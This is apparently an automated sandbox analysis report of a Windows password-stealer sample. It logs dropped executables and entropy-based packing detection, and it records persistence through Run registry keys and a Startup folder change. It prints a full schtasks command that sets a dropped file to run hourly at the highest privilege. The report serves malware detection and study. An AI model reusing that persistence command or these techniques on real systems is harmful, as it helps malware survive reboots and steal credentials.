Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6620 --field-trial-handle=2024,i,5041607828718283965,3196036969284588987,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\ProgramData\MPGPH131\MPGPH131.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static file information: File size 1529344 > 1048576

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x174c00

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdbV source: firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: Control.pdb source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source:	Binary string: Control.pdbhj source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe
Source:	Binary string: RegAsm.pdb source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000000.2117805326.0000000000952000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: z:\task_1551543573\build\openh264\gmpopenh264.pdb source: firefox.exe, 00000033.00000003.2832343051.0000026F50500000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000002.00000002.2596470514.000000000152A000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000007.00000000.2117805326.0000000000952000.00000002.00000001.01000000.00000006.sdmp
Source:	Binary string: Environment.pdb source: explorhe.exe, 0000002E.00000002.4711406923.000000000144A000.00000004.00000020.00020000.00000000.sdmp, autorun[1].exe.46.dr, autorun.exe.46.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Unpacked PE file: 15.2.PXBvYMcLF9IUsaGl9axr.exe.db0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:EW;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:EW;Unknown_Section6:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Unpacked PE file: 46.2.explorhe.exe.950000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.rsrc:EW;Unknown_Section6:EW;.data:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:R;.rsrc:EW;Unknown_Section6:EW;.data:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: autorun[1].exe.46.dr, AaKKpFYFlTUg6do124.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: autorun.exe.46.dr, AaKKpFYFlTUg6do124.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to check for running processes (XOR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,		2_2_0040FCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: GetModuleHandleA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,Process32Next,CloseHandle,		2_2_0040BA50

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0044A530 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

2_2_0044A530

Source: initial sample

Static PE information: section where entry point is pointing to: .data

Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: amer[1].exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:
Source: explorhe.exe.15.dr	Static PE information: section name:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004FB677 push ecx; ret	2_2_004FB68A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00492FC2 push 59000681h; ret	2_2_00492FC9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E44220 push ecx; mov dword ptr [esp], edx	15_2_00E44222
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3C32C push ecx; mov dword ptr [esp], eax	15_2_00E3C32D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E284FC push 00E28528h; ret	15_2_00E28520
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E284C2 push 00E284F0h; ret	15_2_00E284E8
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E285D0 push 00E28604h; ret	15_2_00E285FC
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3C590 push ecx; mov dword ptr [esp], edx	15_2_00E3C595
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E2856C push 00E28598h; ret	15_2_00E28590
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E28534 push 00E28560h; ret	15_2_00E28558
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E26658 push 00E266A9h; ret	15_2_00E266A1
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E40628 push ecx; mov dword ptr [esp], edx	15_2_00E4062A
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E30615 push 00E3079Ch; ret	15_2_00E30794
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3C7B8 push ecx; mov dword ptr [esp], edx	15_2_00E3C7BD
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3079E push 00E3080Fh; ret	15_2_00E30807
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3A8E0 push 00E3A92Dh; ret	15_2_00E3A925
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3C8D4 push ecx; mov dword ptr [esp], edx	15_2_00E3C8D9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E46898 push ecx; mov dword ptr [esp], edx	15_2_00E4689D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E269D0 push 00E269FCh; ret	15_2_00E269F4
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3E9D8 push ecx; mov dword ptr [esp], edx	15_2_00E3E9D9
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E389B6 push 00E38A35h; ret	15_2_00E38A2D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E30922 push 00E30950h; ret	15_2_00E30948
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E26912 push 00E26940h; ret	15_2_00E26938
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3C918 push ecx; mov dword ptr [esp], edx	15_2_00E3C91D
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E38C90 push 00E38CBCh; ret	15_2_00E38CB4
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E22FD8 push eax; ret	15_2_00E23014
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E2CF1F pushad ; iretd	15_2_00E2CF24
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3F3FC push ecx; mov dword ptr [esp], ecx	15_2_00E3F401
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E398E2 push 00E39A30h; ret	15_2_00E39A28
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E3982C push 00E3988Ch; ret	15_2_00E39884
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Code function: 15_2_00E37A80 push 00E37B28h; ret	15_2_00E37B20

Source: SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Static PE information: section name: .text entropy: 7.998374007382508
Source: amer[1].exe.2.dr	Static PE information: section name: entropy: 7.997800271005919
Source: amer[1].exe.2.dr	Static PE information: section name: entropy: 7.9887151454736
Source: amer[1].exe.2.dr	Static PE information: section name: entropy: 7.156560213905044
Source: amer[1].exe.2.dr	Static PE information: section name: entropy: 7.980228334334539
Source: amer[1].exe.2.dr	Static PE information: section name: .data entropy: 7.975703027890971
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name: entropy: 7.997800271005919
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name: entropy: 7.9887151454736
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name: entropy: 7.156560213905044
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name: entropy: 7.980228334334539
Source: PXBvYMcLF9IUsaGl9axr.exe.2.dr	Static PE information: section name: .data entropy: 7.975703027890971
Source: explorhe.exe.15.dr	Static PE information: section name: entropy: 7.997800271005919
Source: explorhe.exe.15.dr	Static PE information: section name: entropy: 7.9887151454736
Source: explorhe.exe.15.dr	Static PE information: section name: entropy: 7.156560213905044
Source: explorhe.exe.15.dr	Static PE information: section name: entropy: 7.980228334334539
Source: explorhe.exe.15.dr	Static PE information: section name: .data entropy: 7.975703027890971
Source: autorun[1].exe.46.dr	Static PE information: section name: .text entropy: 7.881952677820857
Source: autorun.exe.46.dr	Static PE information: section name: .text entropy: 7.881952677820857

Source: autorun[1].exe.46.dr, AaKKpFYFlTUg6do124.cs	High entropy of concatenated method names: 'HxiaS3suFi', 'nW4lBacjpc', 'RhtauXCTpS', 'fhNa2hS7Ku', 'N3IaykJdlr', 'ATaaqT3SpG', 'ALsF2tbbQX', 'oqtgAj5O4', 'AguBUkQFd', 'ydFN0MsLF'
Source: autorun.exe.46.dr, AaKKpFYFlTUg6do124.cs	High entropy of concatenated method names: 'HxiaS3suFi', 'nW4lBacjpc', 'RhtauXCTpS', 'fhNa2hS7Ku', 'N3IaykJdlr', 'ATaaqT3SpG', 'ALsF2tbbQX', 'oqtgAj5O4', 'AguBUkQFd', 'ydFN0MsLF'

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\go[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\autorun[1].exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	File created: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	File created: C:\Users\user\AppData\Local\Temp\1000397001\autorun.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\ProgramData\MPGPH131\MPGPH131.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\amer[1].exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\PXBvYMcLF9IUsaGl9axr.exe	Jump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exe	File created: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	File created: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe	Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\ProgramData\MPGPH131\MPGPH131.exe

Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup
Source: C:\Users\user\AppData\Local\Temp\d887ceb89d\explorhe.exe	Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders Startup

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_0062F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		16_2_0062F98E
Source: C:\Users\user\AppData\Local\Temp\jobA4D66hfr61WFM1U\3kaNpKWTvXjwLZn_llOJ.exe	Code function: 16_2_006A1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		16_2_006A1C41

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0049E590 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_0049E590

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.24221.17365.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\MPGPH131\MPGPH131.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
